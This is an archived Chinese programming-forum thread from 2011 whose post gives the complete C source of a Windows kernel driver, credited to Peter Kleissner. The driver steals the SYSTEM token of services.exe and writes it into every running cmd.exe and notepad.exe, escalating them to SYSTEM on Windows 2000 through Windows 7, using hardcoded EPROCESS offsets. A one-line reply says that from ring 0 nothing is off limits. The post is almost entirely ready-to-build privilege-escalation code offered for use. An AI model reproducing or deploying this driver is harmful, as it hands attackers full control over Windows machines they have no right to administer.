驱动实现win7下cmd提权

乔丹二世 发表于 2011-1-16 00:30:35

//win7提权
//code by Peter Kleissner
#include "ntddk.h"
#include "ntdddisk.h"
#include "windef.h"
#define SbNotifyDriverLoad 0
#define SbInstallWindowsHook 2
#define HookType_Hook       0
#define HookType_Intercept 1
struct
{
void * FunctionName;
void * FunctionHook;
unsigned Type;
} Hook;
void PrivilegeEscalation(IN PVOID StartContext);
void NotifyRoutine(IN PUNICODE_STRING FullImageName, IN HANDLE ProcessId, IN PIMAGE_INFO ImageInfo);
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
HANDLE ThreadHandle;
OBJECT_ATTRIBUTES ObjectAttributes;
DbgPrint("\nhere we go!\n\n");
InitializeObjectAttributes(&ObjectAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsSetLoadImageNotifyRoutine(&NotifyRoutine);

return STATUS_SUCCESS;
}
void NotifyRoutine(IN PUNICODE_STRING FullImageName, IN HANDLE ProcessId, IN PIMAGE_INFO ImageInfo)
{
DbgPrint("Image Load: %wZ\n", FullImageName);

if(_wcsnicmp(FullImageName->Buffer, L"\\Device\\HarddiskVolume1\\Windows\\explorer.exe", 51) == 0 )
PrivilegeEscalation(NULL);
}
void PrivilegeEscalation(IN PVOID StartContext)
{
PEPROCESS CurrentProcess, ServiceProcess, FirstProcess;
DWORD ServiceSecurityToken;
RTL_OSVERSIONINFOW OSVersionInfo;
DWORD OffsetAPL, OffsetIN, OffsetST;
CurrentProcess = IoGetCurrentProcess();
OSVersionInfo.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOW);
PsGetVersion(&OSVersionInfo.dwMajorVersion, &OSVersionInfo.dwMinorVersion, NULL, NULL);
if (!(OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 0))    // RtlGetVersion() is only support on XP and higher
RtlGetVersion(&OSVersionInfo);
if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 0)       // Windows 2000
{ OffsetAPL = 0xA0; OffsetIN = 0x15C; OffsetST = 0x8C; }
else if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 1) // Windows XP
{ OffsetAPL = 0x88; OffsetIN = 0xEC; OffsetST = 0x40; }
else if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 2) // Windows Server 2003
{ OffsetAPL = 0x88; OffsetIN = 0xCC; OffsetST = 0x40;
if (OSVersionInfo.dwBuildNumber == 3790) OffsetAPL += 0x10; }                // Windows Server 2003 R2
else if (OSVersionInfo.dwMajorVersion == 6 && OSVersionInfo.dwMinorVersion == 0) // Windows Vista, Windows Server 2008
{ OffsetAPL = 0xA0; OffsetIN = 0xAC; OffsetST = 0x40; }
else if (OSVersionInfo.dwMajorVersion == 6 && OSVersionInfo.dwMinorVersion == 1) // Windows 7 RC
{ OffsetAPL = 0xB8; OffsetIN = 0xB4; OffsetST = 0x40;
if (OSVersionInfo.dwBuildNumber == 7000) OffsetIN = 0xAC; }                // Windows 7 Beta
else
{
DbgPrint("this is only supported on win 7\n");
return;
}
// find services.exe process structure
ServiceProcess = *(PEPROCESS *)((BYTE *)CurrentProcess + OffsetAPL);
ServiceProcess = *(PEPROCESS *)(ServiceProcess);
while (1)
{
DbgPrint("Found Process: %s\n", (char *)ServiceProcess + OffsetIN);
if (_stricmp((char *)ServiceProcess + OffsetIN, "services.exe") == 0)
   break;
ServiceProcess = *(PEPROCESS *)(ServiceProcess);
}

ServiceSecurityToken = *(DWORD *)((DWORD *)ServiceProcess + OffsetST/4);
DbgPrint("System Service Security Token: %08x\n", ServiceSecurityToken);
// now escalate any cmd.exe, notepad.exe, King Kleissner process
CurrentProcess = *(PEPROCESS *)((BYTE *)CurrentProcess + OffsetAPL);
for (FirstProcess = CurrentProcess; FirstProcess != *(PEPROCESS *)(CurrentProcess); CurrentProcess = *(PEPROCESS *)(CurrentProcess))
{
if ( _stricmp((char *)CurrentProcess + OffsetIN, "cmd.exe") == 0       ||
      _stricmp((char *)CurrentProcess + OffsetIN, "notepad.exe") == 0    )
   {
      DbgPrint("Overwriting old Security Token: %08x\n", *(DWORD *)((DWORD *)CurrentProcess + OffsetST/4));
      ObReferenceObject((void *)ServiceSecurityToken);
      *(DWORD *)((DWORD *)CurrentProcess + OffsetST/4) = ServiceSecurityToken;
      DbgPrint("cmd.exe privilege escalated successfully!\n");
   }
}
}

dico 发表于 2011-11-8 11:13:32

都进入R0了，还有什么事做不了啊

页: [1]

紫水晶编程技术论坛 - 努力打造成全国最好的编程论坛's Archiver

驱动实现win7下cmd提权